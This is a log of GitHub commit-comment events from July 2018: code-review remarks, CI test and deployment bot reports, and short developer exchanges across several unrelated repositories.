{"id":"7946799410","type":"CommitCommentEvent","actor":{"login":"creslin"},"repo":{"name":"xmatthias/freqtrade"},"payload":{"comment":{"id":29663952,"position":null,"line":null,"path":null,"commit_id":"748dbb817197fa51ba8746c1e59ffefdfdc8a63d","created_at":"2018-07-10T22:50:47Z","updated_at":"2018-07-10T22:50:47Z","author_association":"NONE","body":"I don't recall ever using, buying or mining cryptocurrency, why's my data\nbeing implemented?\n\nOn Tue, Jul 10, 2018 at 12:38 PM, Matthias <notifications@github.com> wrote:\n\n> Refactor tests, implement @creslin's data\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/xmatthias/freqtrade/commit/\n> 748dbb817197fa51ba8746c1e59ffefdfdc8a63d\n>\n"}},"created_at":"2018-07-10T22:50:47Z"}
{"id":"7946799536","type":"CommitCommentEvent","actor":{"login":"aoby"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":29663954,"position":4,"line":658,"path":"dashboard/test/ui/runner.rb","commit_id":"62532044404c7b2eec5f6fb6cfe3165ae0357094","created_at":"2018-07-10T22:50:50Z","updated_at":"2018-07-10T22:50:50Z","author_association":"CONTRIBUTOR","body":"why not `to_s`?"}},"created_at":"2018-07-10T22:50:50Z"}
{"id":"7946801735","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29663960,"position":null,"line":null,"path":null,"commit_id":"1f95f221a92be219fc80b15e0772a67bca222ca1","created_at":"2018-07-10T22:51:31Z","updated_at":"2018-07-10T22:51:31Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T22:51:31Z"}
{"id":"7946801908","type":"CommitCommentEvent","actor":{"login":"cabdihashi"},"repo":{"name":"cabdihashi/HW-Wireframe"},"payload":{"comment":{"id":29663961,"position":null,"line":null,"path":null,"commit_id":"40d222a4b21ce54e91cbcd0fce4af478c53249ba","created_at":"2018-07-10T22:51:34Z","updated_at":"2018-07-10T22:51:34Z","author_association":"OWNER","body":"cd Ahlan git file"}},"created_at":"2018-07-10T22:51:34Z"}
{"id":"7946802543","type":"CommitCommentEvent","actor":{"login":"domwashburn"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29663965,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-10T22:51:46Z","updated_at":"2018-07-10T22:51:46Z","author_association":"NONE","body":"I was having a little trouble with a the pre-release throwing `EINVALIDNEXTVERSION` and it seems to stem from the added tag (alpha, bets, etc.). I made a quick update locally that solves the problem using the semver library to coerce a valid version number from the next version.\r\n\r\n I'm not sure if you're looking for PRs on this active work or if this code will satisfy your standards, but here's how I fixed it :)\r\n\r\n``` js\r\n  const nextVersion = getNextVersion(branch, type, lastRelease, logger);\r\n  const version = semver.valid(semver.coerce(nextVersion));\r\n```"}},"created_at":"2018-07-10T22:51:46Z"}
{"id":"7946803007","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663966,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-10T22:51:56Z","updated_at":"2018-07-10T22:51:56Z","author_association":"NONE","body":"issue_6729 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T22:51:56Z"}
{"id":"7946803922","type":"CommitCommentEvent","actor":{"login":"bittechusa"},"repo":{"name":"bittech/BTC009"},"payload":{"comment":{"id":29663970,"position":null,"line":null,"path":null,"commit_id":"df9c3a3aaff798ada8eb821747456ba08880cd3b","created_at":"2018-07-10T22:52:13Z","updated_at":"2018-07-10T22:52:13Z","author_association":"CONTRIBUTOR","body":"@sislam01 "}},"created_at":"2018-07-10T22:52:13Z"}
{"id":"7946804589","type":"CommitCommentEvent","actor":{"login":"cabdihashi"},"repo":{"name":"cabdihashi/HW-Wireframe"},"payload":{"comment":{"id":29663972,"position":null,"line":null,"path":null,"commit_id":"40d222a4b21ce54e91cbcd0fce4af478c53249ba","created_at":"2018-07-10T22:52:22Z","updated_at":"2018-07-10T22:52:22Z","author_association":"OWNER","body":"git clone Ahlan~"}},"created_at":"2018-07-10T22:52:22Z"}
{"id":"7946804883","type":"CommitCommentEvent","actor":{"login":"bittechusa"},"repo":{"name":"bittech/BTC009"},"payload":{"comment":{"id":29663973,"position":null,"line":null,"path":null,"commit_id":"df9c3a3aaff798ada8eb821747456ba08880cd3b","created_at":"2018-07-10T22:52:27Z","updated_at":"2018-07-10T22:52:27Z","author_association":"CONTRIBUTOR","body":"great"}},"created_at":"2018-07-10T22:52:27Z"}
{"id":"7946808254","type":"CommitCommentEvent","actor":{"login":"bittechusa"},"repo":{"name":"bittech/BTC009"},"payload":{"comment":{"id":29663986,"position":null,"line":null,"path":null,"commit_id":"df9c3a3aaff798ada8eb821747456ba08880cd3b","created_at":"2018-07-10T22:53:30Z","updated_at":"2018-07-10T22:53:30Z","author_association":"CONTRIBUTOR","body":"everything fine"}},"created_at":"2018-07-10T22:53:30Z"}
{"id":"7946810087","type":"CommitCommentEvent","actor":{"login":"antonkryvko"},"repo":{"name":"antonkryvko/Front-End-Checklist"},"payload":{"comment":{"id":29663993,"position":null,"line":null,"path":null,"commit_id":"a2e4d3dc61c67bcac681ac38d866317eac36a326","created_at":"2018-07-10T22:54:06Z","updated_at":"2018-07-10T22:54:06Z","author_association":"OWNER","body":"Так, я не звернув увагу на те, що fork'нув не той репозиторій лише коли вже зробив переклад. Проблема в тому, що власник оригінального репозиторію вже додав посилання на мій fork, а декілька користувачів додали його у вибрані. Щоб зробити новий fork від оригінального, треба видалити цей, а це автоматично обнулить вибрані. Тому я заспокоюю себе, що для github fork fork'а є fork'ом оригіналу.\r\n\r\nЩодо виправлень, то можете надіслати їх або pull request або issue."}},"created_at":"2018-07-10T22:54:06Z"}
{"id":"7946812462","type":"CommitCommentEvent","actor":{"login":"CezaryDanielNowak"},"repo":{"name":"kornelrakowski/kalkulator_maturalny"},"payload":{"comment":{"id":29664003,"position":3,"line":3,"path":"dirs.js","commit_id":"8cf898229d51231a9879b68515cf1c07842ac363","created_at":"2018-07-10T22:54:49Z","updated_at":"2018-07-10T22:54:49Z","author_association":"NONE","body":"strict comparision is preferred `!==` over loose comparision"}},"created_at":"2018-07-10T22:54:49Z"}
{"id":"7946816544","type":"CommitCommentEvent","actor":{"login":"aszlig"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29664013,"position":null,"line":null,"path":null,"commit_id":"7ac794f8780f4c35221763de6a425a07004515f2","created_at":"2018-07-10T22:56:11Z","updated_at":"2018-07-10T22:56:11Z","author_association":"MEMBER","body":"@xeji: Thanks a lot."}},"created_at":"2018-07-10T22:56:11Z"}
{"id":"7946816747","type":"CommitCommentEvent","actor":{"login":"CezaryDanielNowak"},"repo":{"name":"kornelrakowski/kalkulator_maturalny"},"payload":{"comment":{"id":29664014,"position":9,"line":9,"path":"dirs.js","commit_id":"8cf898229d51231a9879b68515cf1c07842ac363","created_at":"2018-07-10T22:56:14Z","updated_at":"2018-07-10T22:56:14Z","author_association":"NONE","body":"such data is perfect use case to use classes"}},"created_at":"2018-07-10T22:56:14Z"}
{"id":"7946822931","type":"CommitCommentEvent","actor":{"login":"CezaryDanielNowak"},"repo":{"name":"kornelrakowski/kalkulator_maturalny"},"payload":{"comment":{"id":29664034,"position":912,"line":936,"path":"main.js","commit_id":"8cf898229d51231a9879b68515cf1c07842ac363","created_at":"2018-07-10T22:58:10Z","updated_at":"2018-07-10T22:58:10Z","author_association":"NONE","body":"Whoa, making this file was probably TEDIOUS"}},"created_at":"2018-07-10T22:58:10Z"}
{"id":"7946824162","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Todo"},"payload":{"comment":{"id":29664036,"position":null,"line":null,"path":null,"commit_id":"23b9f5861e9a759e210d6c941c91ce5ae4ff46f0","created_at":"2018-07-10T22:58:33Z","updated_at":"2018-07-10T22:58:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Todo - React (MVP)](https://trello.com/c/acir8wuH/5-todo-react-mvp)"}},"created_at":"2018-07-10T22:58:33Z"}
{"id":"7946824730","type":"CommitCommentEvent","actor":{"login":"sureshc"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":29664038,"position":null,"line":null,"path":null,"commit_id":"62532044404c7b2eec5f6fb6cfe3165ae0357094","created_at":"2018-07-10T22:58:44Z","updated_at":"2018-07-10T22:58:44Z","author_association":"CONTRIBUTOR","body":"That would be my first inclination, but the other booleans are being converted using the ternary if/else pattern?  https://github.com/code-dot-org/code-dot-org/blob/62532044404c7b2eec5f6fb6cfe3165ae0357094/dashboard/test/ui/runner.rb#L653-L655"}},"created_at":"2018-07-10T22:58:44Z"}
{"id":"7946825461","type":"CommitCommentEvent","actor":{"login":"sureshc"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":29664041,"position":4,"line":658,"path":"dashboard/test/ui/runner.rb","commit_id":"62532044404c7b2eec5f6fb6cfe3165ae0357094","created_at":"2018-07-10T22:58:58Z","updated_at":"2018-07-10T22:58:58Z","author_association":"CONTRIBUTOR","body":"That would be my first inclination, but the other booleans are being converted using the ternary if/else pattern?  https://github.com/code-dot-org/code-dot-org/blob/62532044404c7b2eec5f6fb6cfe3165ae0357094/dashboard/test/ui/runner.rb#L653-L655"}},"created_at":"2018-07-10T22:58:58Z"}
{"id":"7946827331","type":"CommitCommentEvent","actor":{"login":"CezaryDanielNowak"},"repo":{"name":"kornelrakowski/kalkulator_maturalny"},"payload":{"comment":{"id":29664045,"position":16,"line":88,"path":"main.js","commit_id":"8cf898229d51231a9879b68515cf1c07842ac363","created_at":"2018-07-10T22:59:34Z","updated_at":"2018-07-10T22:59:34Z","author_association":"NONE","body":"what is 1.05 ? This should be moved to constant, like:\r\n`const POINTS_MULTIPLER_THRESHOLD = 1.05;`"}},"created_at":"2018-07-10T22:59:34Z"}
{"id":"7946829653","type":"CommitCommentEvent","actor":{"login":"CezaryDanielNowak"},"repo":{"name":"kornelrakowski/kalkulator_maturalny"},"payload":{"comment":{"id":29664057,"position":21,"line":93,"path":"main.js","commit_id":"8cf898229d51231a9879b68515cf1c07842ac363","created_at":"2018-07-10T23:00:16Z","updated_at":"2018-07-10T23:00:16Z","author_association":"NONE","body":"classes looks like in bootstrap... If you use bootstrap, you can use jquery... with jquery DOM manipulation is much easier :)"}},"created_at":"2018-07-10T23:00:16Z"}
{"id":"7946833796","type":"CommitCommentEvent","actor":{"login":"chappjc"},"repo":{"name":"decred/dcrdata"},"payload":{"comment":{"id":29664072,"position":46,"line":147,"path":"db/dcrpg/upgrades.go","commit_id":"0c38357a7ec728808622e7702a0b65754f33499c","created_at":"2018-07-10T23:01:30Z","updated_at":"2018-07-10T23:01:30Z","author_association":"MEMBER","body":"Good. Just please add a debug message saying the agenda is unknown, please update dcrdata"}},"created_at":"2018-07-10T23:01:30Z"}
{"id":"7946837137","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29664078,"position":null,"line":null,"path":null,"commit_id":"b8dd78a98c122f72ae3e67730ef9a5b177a98de7","created_at":"2018-07-10T23:02:34Z","updated_at":"2018-07-10T23:02:34Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/1984/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20956 seconds\n\nTests produced 2925 warnings. 2925 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-10T23:02:34Z"}
{"id":"7946840895","type":"CommitCommentEvent","actor":{"login":"zarboz"},"repo":{"name":"MrDoctorKovacic/pyBus"},"payload":{"comment":{"id":29664085,"position":null,"line":null,"path":null,"commit_id":"4ef3e25398021000e9b77b38a700e909a9446fd5","created_at":"2018-07-10T23:03:46Z","updated_at":"2018-07-10T23:03:46Z","author_association":"NONE","body":"@MrDoctorKovacic  i got a parts 16:9 from a e36 a working 4:3 from a e36 and a parts 16:9 from a e39\r\n\r\nJust ordered a 7inch LCD to retrofit my head unit the same way the instagram i linked did....\r\n\r\n\r\nBUT this hifiberry with digital out via a bung terminal (similar or same to BMW dsp lines) would let me pipe the sound out to the DSP amp digitally instead of over the L/R emulated DSP lines from the nav unit \r\n\r\n\r\nat least thats how I understand the system to be working (emulated DSP via L/R audio from radio unit or from cd/tape under nav screen or tape player/cd player at head if no nav) \r\n\r\n"}},"created_at":"2018-07-10T23:03:46Z"}
{"id":"7946841638","type":"CommitCommentEvent","actor":{"login":"abourov"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":29664088,"position":null,"line":null,"path":null,"commit_id":"79578dde48a557f73df21a14e54ffe19f8441dc7","created_at":"2018-07-10T23:04:01Z","updated_at":"2018-07-10T23:04:01Z","author_association":"NONE","body":"This, unfortunately, doesn't work for wsdl:import "}},"created_at":"2018-07-10T23:04:01Z"}
{"id":"7946843844","type":"CommitCommentEvent","actor":{"login":"GamiiisKth"},"repo":{"name":"GamiiisKth/lcoco-toolchain"},"payload":{"comment":{"id":29664094,"position":null,"line":null,"path":null,"commit_id":"769e302e0910f40b913fc002ff35c2ee543c8163","created_at":"2018-07-10T23:04:44Z","updated_at":"2018-07-10T23:04:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0b5461dc-e7b0-4d4e-b1d1-dae514c45f9f?env_id=ibm%3Ayp%3Aeu-de \"lcoco-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/668c7960-990d-4b62-bc8c-ffc62eb11a13?env_id=ibm%3Ayp%3Aeu-de \"lcoco-toolchain\") deployed [lcoco-toolchain](https://github.com/GamiiisKth/lcoco-toolchain/releases/tag/deploy-ibm-yp-eu-de-admin-lcoco.se-dev-20180710-230442 \"deploy-ibm-yp-eu-de-admin-lcoco.se-dev-20180710-230442\") to [dev](https://console.bluemix.net/apps/b456ddc6-614f-4d70-adda-a392af995101?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:admin@lcoco.se:dev\"), including this commit"}},"created_at":"2018-07-10T23:04:44Z"}
{"id":"7946843903","type":"CommitCommentEvent","actor":{"login":"abourov"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":29664095,"position":28,"line":37,"path":"src/zeep/wsdl/bindings/http.py","commit_id":"79578dde48a557f73df21a14e54ffe19f8441dc7","created_at":"2018-07-10T23:04:45Z","updated_at":"2018-07-10T23:04:45Z","author_association":"NONE","body":"Shouldn't this be 7?"}},"created_at":"2018-07-10T23:04:45Z"}
{"id":"7946844062","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664097,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-10T23:04:48Z","updated_at":"2018-07-10T23:04:48Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T23:04:48Z"}
{"id":"7946845815","type":"CommitCommentEvent","actor":{"login":"mwilcox12015"},"repo":{"name":"mwilcox12015/sample-cloud-native-toolchain-tutorial-20180709224216860"},"payload":{"comment":{"id":29664104,"position":null,"line":null,"path":null,"commit_id":"e8eb04a5d26bf783e382ee201ccc773d96f1cda4","created_at":"2018-07-10T23:05:22Z","updated_at":"2018-07-10T23:05:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/75b7b520-d5f1-436d-a6df-378d32bada9b?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709224216860\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f8568402-cff1-42bb-9d27-87a549616687?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709224216860\") deployed [sample-cloud-native-toolchain-tutorial-20180709224216860](https://github.com/mwilcox12015/sample-cloud-native-toolchain-tutorial-20180709224216860/releases/tag/deploy-ibm-yp-us-south-mwilcox1-us.ibm.com-test-20180710-230521 \"deploy-ibm-yp-us-south-mwilcox1-us.ibm.com-test-20180710-230521\") to [test](https://console.bluemix.net/apps/5d197ba9-a214-4c79-9ba0-67ebde0b5c44?env_id=ibm:yp:us-south \"ibm:yp:us-south:mwilcox1@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-10T23:05:22Z"}
{"id":"7946849513","type":"CommitCommentEvent","actor":{"login":"mrustl"},"repo":{"name":"KWB-R/GeoSalz"},"payload":{"comment":{"id":29664111,"position":null,"line":null,"path":null,"commit_id":"ea9668cd1409528000d953fd7f52b4b45a280d1b","created_at":"2018-07-10T23:06:34Z","updated_at":"2018-07-10T23:06:34Z","author_association":"MEMBER","body":"I think my last commit destroyed your changes. Sorry!"}},"created_at":"2018-07-10T23:06:34Z"}
{"id":"7946851015","type":"CommitCommentEvent","actor":{"login":"elavinal"},"repo":{"name":"platu/inetdoc"},"payload":{"comment":{"id":29664113,"position":null,"line":null,"path":null,"commit_id":"fa6541b6ad2cff6926b8d2750e89d00052a4b259","created_at":"2018-07-10T23:07:04Z","updated_at":"2018-07-10T23:07:04Z","author_association":"NONE","body":"Les exemples font bien référence au service `Quad9` mais il me semble que dans la phrase qui précède tu parles encore « d'adresses IPv4 et IPv6 du service Google »."}},"created_at":"2018-07-10T23:07:04Z"}
{"id":"7946851757","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29664115,"position":null,"line":null,"path":null,"commit_id":"347058f417b8b699817aa1c3b0eaee4b8867f4ce","created_at":"2018-07-10T23:07:18Z","updated_at":"2018-07-10T23:07:18Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-10T23:07:18Z"}
{"id":"7946853148","type":"CommitCommentEvent","actor":{"login":"andy505050"},"repo":{"name":"andy505050/MVCHomwork"},"payload":{"comment":{"id":29664119,"position":null,"line":null,"path":null,"commit_id":"16e0926184738bf6d6bb07667307b84488e18f2f","created_at":"2018-07-10T23:07:45Z","updated_at":"2018-07-10T23:07:45Z","author_association":"OWNER","body":"約30分鐘"}},"created_at":"2018-07-10T23:07:45Z"}
{"id":"7946855226","type":"CommitCommentEvent","actor":{"login":"mwilcox12015"},"repo":{"name":"mwilcox12015/sample-cloud-native-toolchain-tutorial-20180709224216860"},"payload":{"comment":{"id":29664128,"position":null,"line":null,"path":null,"commit_id":"e8eb04a5d26bf783e382ee201ccc773d96f1cda4","created_at":"2018-07-10T23:08:27Z","updated_at":"2018-07-10T23:08:27Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/75b7b520-d5f1-436d-a6df-378d32bada9b?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709224216860\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f8568402-cff1-42bb-9d27-87a549616687?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709224216860\") deployed [sample-cloud-native-toolchain-tutorial-20180709224216860](https://github.com/mwilcox12015/sample-cloud-native-toolchain-tutorial-20180709224216860/releases/tag/deploy-ibm-yp-us-south-mwilcox1-us.ibm.com-prod-20180710-230826 \"deploy-ibm-yp-us-south-mwilcox1-us.ibm.com-prod-20180710-230826\") to [prod](https://console.bluemix.net/apps/80c30fb7-2d36-4225-aa99-d38c1992efe2?env_id=ibm:yp:us-south \"ibm:yp:us-south:mwilcox1@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-10T23:08:27Z"}
{"id":"7946857308","type":"CommitCommentEvent","actor":{"login":"dmigwi"},"repo":{"name":"decred/dcrdata"},"payload":{"comment":{"id":29664134,"position":46,"line":147,"path":"db/dcrpg/upgrades.go","commit_id":"0c38357a7ec728808622e7702a0b65754f33499c","created_at":"2018-07-10T23:09:06Z","updated_at":"2018-07-10T23:09:06Z","author_association":"MEMBER","body":"ok. Noted"}},"created_at":"2018-07-10T23:09:06Z"}
{"id":"7946860498","type":"CommitCommentEvent","actor":{"login":"kjetilho"},"repo":{"name":"jonschipp/nagios-plugins"},"payload":{"comment":{"id":29664140,"position":null,"line":null,"path":null,"commit_id":"939de4b432aa4f1eaa90671f8905c1595639fbdb","created_at":"2018-07-10T23:10:12Z","updated_at":"2018-07-10T23:10:12Z","author_association":"NONE","body":"this patch is completely broken.  instead of using the exit code from `systemctl status`, it uses the exit status from `grep -i Active`, which is true for all services - including *in*active units, or even `activemq.service`.\r\n\r\nI see no reason to not trust the exit status from `systemctl status` as it is.\r\n\r\nif you *really* want to get \"pretty\" output:\r\n\r\n* TRUST_EXIT_CODE must be set to 0\r\n* the USERNAME case must  grep as well\r\n* LC_MESSAGES must be forced to English\r\n* the grep command must be modified to `grep \"^ *Active:\"` (no `-i`, and note colon) to avoid the activemq problem etc.\r\n"}},"created_at":"2018-07-10T23:10:12Z"}
{"id":"7946863719","type":"CommitCommentEvent","actor":{"login":"Teofanovic"},"repo":{"name":"filipKuz/eLearning"},"payload":{"comment":{"id":29664147,"position":null,"line":null,"path":null,"commit_id":"b5142cf1968c59385dd1070abea5cb96250ca0c8","created_at":"2018-07-10T23:11:16Z","updated_at":"2018-07-10T23:11:16Z","author_association":"COLLABORATOR","body":"Mozee jos jedno mesto gde cu menjati sifru 😄 "}},"created_at":"2018-07-10T23:11:16Z"}
{"id":"7946863947","type":"CommitCommentEvent","actor":{"login":"pvdlg"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29664149,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-10T23:11:20Z","updated_at":"2018-07-10T23:11:20Z","author_association":"MEMBER","body":"Thanks for the feedback!\r\nCan you clarify in which circumstance this happens? What tags do you have on which branch? Which branch are you merging to which?"}},"created_at":"2018-07-10T23:11:20Z"}
{"id":"7946864401","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29664151,"position":null,"line":null,"path":null,"commit_id":"b8dd78a98c122f72ae3e67730ef9a5b177a98de7","created_at":"2018-07-10T23:11:29Z","updated_at":"2018-07-10T23:11:29Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/1983/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/commit/b8dd78a98c122f72ae3e67730ef9a5b177a98de7/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21605 seconds\n\nTests produced 2924 warnings. 2924 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-10T23:11:29Z"}
{"id":"7946865548","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29664153,"position":null,"line":null,"path":null,"commit_id":"957db1d234f15292d788392fd24c76f6a985e8bc","created_at":"2018-07-10T23:11:53Z","updated_at":"2018-07-10T23:11:53Z","author_association":"COLLABORATOR","body":"<h3>better menu example text</h3>\n\nPreview: <strong><a href='https://18211-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18211-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18211-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T23:11:53Z"}
{"id":"7946871975","type":"CommitCommentEvent","actor":{"login":"alxmiron"},"repo":{"name":"HiTask/blueprint"},"payload":{"comment":{"id":29664171,"position":null,"line":null,"path":null,"commit_id":"bed1bd52b0d299304799a2d27bf0bd0288ad9a83","created_at":"2018-07-10T23:14:01Z","updated_at":"2018-07-10T23:14:01Z","author_association":"NONE","body":"<h3>Merge branch 'upstream-develop' into custom</h3>\n\nPreview: <strong><a href='https://417-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://417-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://417-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T23:14:01Z"}
{"id":"7946874933","type":"CommitCommentEvent","actor":{"login":"ldaley"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29664178,"position":null,"line":null,"path":null,"commit_id":"671ce70c2b30b1d6318741deb289248a2505e089","created_at":"2018-07-10T23:15:00Z","updated_at":"2018-07-10T23:15:00Z","author_association":"MEMBER","body":"This was just a merge from release to master, that I missed IDEA was injecting a commit message for."}},"created_at":"2018-07-10T23:15:00Z"}
{"id":"7946878291","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29664189,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-10T23:16:07Z","updated_at":"2018-07-10T23:16:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-774](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-774).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-774-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-10T23:16:07Z"}
{"id":"7946882172","type":"CommitCommentEvent","actor":{"login":"drojf"},"repo":{"name":"07th-mod/Higurashi_Installer_WPF"},"payload":{"comment":{"id":29664195,"position":5,"line":31,"path":"Higurashi_Installer_WPF/MainWindow.xaml.cs","commit_id":"6cab85f060cb76c0496cbcec61c271071188a8cd","created_at":"2018-07-10T23:17:25Z","updated_at":"2018-07-10T23:17:25Z","author_association":"CONTRIBUTOR","body":"shit thanks man, I think I have ignore whitespace turned on so I don't see it on my diff :("}},"created_at":"2018-07-10T23:17:25Z"}
{"id":"7946887226","type":"CommitCommentEvent","actor":{"login":"dstopp"},"repo":{"name":"SETI/pds-opus"},"payload":{"comment":{"id":29664203,"position":null,"line":null,"path":null,"commit_id":"5f7e613a9fd94f65e5e3f10e4ad51ec35212379d","created_at":"2018-07-10T23:19:07Z","updated_at":"2018-07-10T23:19:07Z","author_association":"COLLABORATOR","body":"fixes duplicate element issue when no item is selected for detail page"}},"created_at":"2018-07-10T23:19:07Z"}
{"id":"7946887358","type":"CommitCommentEvent","actor":{"login":"sentriz"},"repo":{"name":"ALiangLiang/vue-chrome-extension-template"},"payload":{"comment":{"id":29664204,"position":null,"line":null,"path":null,"commit_id":"af9f3d671a2eb785b068391a5d81ebc23fe6f6dd","created_at":"2018-07-10T23:19:11Z","updated_at":"2018-07-10T23:19:11Z","author_association":"NONE","body":"thank you"}},"created_at":"2018-07-10T23:19:11Z"}
{"id":"7946892033","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29664216,"position":12,"line":32,"path":"contents/index.adoc","commit_id":"a66db7c195923044c88e886eee752256ca7a7c8d","created_at":"2018-07-10T23:20:45Z","updated_at":"2018-07-10T23:20:45Z","author_association":"MEMBER","body":"Lines 29 and 31 go together.\r\nLines 30 and 32 go together.\r\n\r\niow, \"the same applies\" on line 31 refers to line 29 but has nothing to do with line 30 that would be better next to line 32."}},"created_at":"2018-07-10T23:20:45Z"}
